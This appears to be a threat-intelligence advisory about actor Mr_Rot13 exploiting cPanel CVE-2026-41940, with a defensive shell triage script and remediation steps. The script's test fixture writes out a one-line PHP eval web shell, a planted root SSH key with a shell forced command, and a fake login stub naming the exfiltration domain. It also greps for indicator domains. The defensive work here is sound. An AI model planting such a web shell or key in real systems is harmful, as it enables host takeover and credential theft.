Last updated: May 13, 2026 at 5:42 AM UTC
Tag: mr-rot13 (1 article)

Mr_Rot13 actor exploits cPanel CVE-2026-41940 to deploy cross-platform 'Filemanager' backdoor

QiAnXin XLab has attributed the ongoing exploitation of cPanel's CVE-2026-41940 to a previously quiet threat actor it tracks as Mr_Rot13, active since at least 2020. The chain uses the cPanel and WHM authentication bypass to drop a Go-based infector that adds an attacker-controlled SSH public key under root, plants a PHP web shell, and serves a fake cPanel login page that harvests credentials, ROT13-encodes them and exfiltrates them to wrned[.]com. The final payload is a cross-platform backdoor called Filemanager with Windows, macOS, and Linux builds. XLab counts more than 2,000 attacker source IPs currently scanning for the flaw.

Check
Search cPanel and WHM authentication logs for unexpected successful logins since April 28, the disclosure date. Compare /root/.ssh/authorized_keys on every cPanel host against the keys you know you deployed, and search web roots for PHP files you did not put there, starting with anything modified since that date. Treat a clean modification-time sweep as weak evidence only: an attacker can reset timestamps, so also look at file contents, including any PHP file that references the wrned[.]com exfiltration domain.
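The three checks above as one POSIX shell triage script. This is an added example for this page, not XLab's or cPanel's tooling: each function takes the files it inspects as arguments, and the constructed sample data at the bottom stands in for a real host. The log line layout, the key blobs, and the cPanel paths named in the comments (/root/.ssh/authorized_keys, /home/*/public_html) are assumptions; the domains are the plain forms of the de-fanged indicators in the article.

```shell
#!/bin/sh
# Triage helper for an internet-exposed cPanel/WHM host. Added example; paths
# and log layout are assumptions, not details taken from the XLab report.

# 1. authorized_keys entries whose key blob does not appear in ALLOWLIST.
#    ALLOWLIST may hold full public-key lines or bare blobs, so a copy of the
#    known-good authorized_keys or the team's .pub files works. The blob is
#    located by pattern rather than taken from $2, so option prefixes such as
#    command="..." or from="..." cannot hide a key from the comparison.
unknown_ssh_keys() {  # KEYS_FILE ALLOWLIST
  awk 'function blob(   i) {
         for (i = 1; i <= NF; i++)
           if ($i ~ /^AAAA[A-Za-z0-9+\/=]+$/) return $i
         return ""
       }
       $1 ~ /^#/ || NF == 0 { next }
       FILENAME == ARGV[1] { b = blob(); if (b != "") allow[b] = 1; next }
       { b = blob(); if (b != "" && !(b in allow)) print }' "$2" "$1"
}

# 2. *.php files under WEBROOT modified after CUTOFF (CCYYMMDDhhmm, local
#    time). A reference file plus find -newer is POSIX; -newermt is GNU-only.
#    Timestamps can be reset by an attacker, so an empty result is not a pass.
recent_php_files() {  # WEBROOT CUTOFF
  ref=$(mktemp) || return 1
  touch -t "$2" "$ref" && find "$1" -type f -name '*.php' -newer "$ref" | sort
  rm -f "$ref"
}

# 3. Files under WEBROOT that reference the actor's exfiltration or delivery
#    domains. The fake login page posts stolen credentials to wrned.com, so a
#    PHP file naming that host is not something a legitimate site contains.
ioc_domain_hits() {  # WEBROOT
  grep -rlE 'wrned\.com|cp\.dene\.de\.com|wpsock\.com' "$1" | sort
}

# 4. Lines of LOG dated on or after CUTOFF (YYYY-MM-DD) that contain MARKER.
#    ISO dates compare correctly as strings, so no date parsing is needed.
#    Assumes the date is the first field; adjust for the real log's layout.
log_lines_since() {  # LOG CUTOFF MARKER
  awk -v cutoff="$2" -v marker="$3" \
      'substr($1, 1, 10) >= cutoff && index($0, marker) > 0' "$1"
}

# Constructed sample host (not real data): one known key, one planted key with
# a forced-command prefix, an old index.php, a web shell and a fake login page
# dropped on 2 May, and a log with one successful login after disclosure.
demo_setup() {  # DIR
  root="$1"
  mkdir -p "$root/public_html/wp-admin" "$root/.ssh"
  echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKnownAdminKey0000000000000000000000 admin@corp' \
    > "$root/allow.txt"
  cat > "$root/.ssh/authorized_keys" <<'EOF'
# deployed by provisioning
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKnownAdminKey0000000000000000000000 admin@corp
command="/bin/sh" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIUnknownKey00000000000000000000000000 x
EOF
  printf '<?php echo "ok";\n' > "$root/public_html/index.php"
  touch -t 202603010900 "$root/public_html/index.php"
  printf '<?php @eval($_POST["c"]);\n' > "$root/public_html/wp-admin/wp-cache.php"
  touch -t 202605020315 "$root/public_html/wp-admin/wp-cache.php"
  printf '<?php $u = "https://wrned.com/"; // fake login form posts here\n' \
    > "$root/public_html/login.php"
  touch -t 202605020316 "$root/public_html/login.php"
  cat > "$root/login_log" <<'EOF'
2026-04-20 11:02:10 +0000 whostmgrd LOGIN OK user=root ip=198.51.100.4
2026-05-02 03:14:02 +0000 whostmgrd LOGIN OK user=root ip=203.0.113.9
2026-05-02 03:14:40 +0000 cpaneld LOGIN FAILED user=root ip=203.0.113.9
EOF
}

# Stand-alone run against the sample host. On a real cPanel server pass
# /root/.ssh/authorized_keys, each /home/*/public_html, and the cPanel logs.
run_demo() {
  demo=$(mktemp -d) || exit 1
  demo_setup "$demo"
  echo "== unknown keys in root authorized_keys"
  unknown_ssh_keys "$demo/.ssh/authorized_keys" "$demo/allow.txt"
  echo "== PHP files modified since 2026-04-28"
  recent_php_files "$demo/public_html" 202604280000
  echo "== files referencing indicator domains"
  ioc_domain_hits "$demo/public_html"
  echo "== successful logins since 2026-04-28"
  log_lines_since "$demo/login_log" 2026-04-28 'LOGIN OK'
  rm -rf "$demo"
}
run_demo
```

The allowlist comparison is by key blob rather than by whole line on purpose: the planted key in the sample carries a forced-command prefix, and comparing full lines would let a known key with a changed comment or option field look foreign while letting nothing slip through the other way. Run the content check even when the timestamp sweep is empty.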
Affected
Any cPanel or WHM installation that has been reachable from the internet and unpatched against CVE-2026-41940 at any point since disclosure on April 28, 2026. Indicators of Mr_Rot13 compromise include an unknown SSH public key in root's authorized_keys, the wrned[.]com credential exfiltration domain, the cp.dene[.]de[.]com infector source, and the wpsock[.]com Filemanager delivery domain.
Fix
If still unpatched, install the cPanel fix for CVE-2026-41940 immediately. Patching closes the entry point but does not evict an actor who already holds an SSH key, a web shell, or the Filemanager backdoor on the host, so on any host that was internet-exposed and unpatched, assume compromise: remove unknown keys from /root/.ssh/authorized_keys, sweep web roots for unfamiliar PHP files, block wrned[.]com, cp.dene[.]de[.]com, and wpsock[.]com at egress, rotate the WHM root credentials, and reset the password of every cPanel account whose user may have entered it into the fake login page, since that page harvests account credentials rather than only root's. Check root's ~/.bash_history for evidence of attacker reconnaissance, treating an empty or truncated history on a busy host as suspicious in itself.